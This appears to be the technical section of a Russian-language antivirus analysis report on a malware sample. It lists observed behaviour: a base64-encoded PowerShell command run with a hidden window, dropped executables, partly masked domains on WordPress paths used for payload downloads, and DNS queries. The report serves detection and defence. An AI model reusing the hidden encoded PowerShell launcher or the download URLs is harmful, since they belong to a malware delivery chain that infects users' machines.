Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKADQAQQBBAFUAQQA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAFUAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnADQAQQAnACwAJwBRAEcAJwApACwAJwBoACcAKQA7ACQAdABBAEEAQQBBAEQAIAA9ACAAJwA0ADYANAAnADsAJ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1532
- %TEMP%\1365975.cvr
- %HOMEPATH%\464.exe
- %HOMEPATH%\464.exe
- 'in###bras.com':80
- 'me###ica.com':80
- 'lu##haxa.vn':443
- 'al####hapas.com.br':80
- 'al####hapas.com.br':443
- http://in###bras.com/wp-admin/T0_3/
- http://me###ica.com/vujgtlo/Fz_PU/
- http://me###ica.com/404.html
- http://al####hapas.com.br/wp-includes/1_tU/
- 'lu##haxa.vn':443
- 'al####hapas.com.br':443
- DNS ASK in###bras.com
- DNS ASK he###loka.ga
- DNS ASK me###ica.com
- DNS ASK lu##haxa.vn
- DNS ASK al####hapas.com.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKADQAQQBBAFUAQQA9ACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAnAFUAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnADQAQQAnACwAJwBRAEcAJwApACwAJwBoACcAKQA7ACQAdABBAEEAQQBBAEQAIAA9ACAAJwA0ADYANAAnADsAJ...' (со скрытым окном)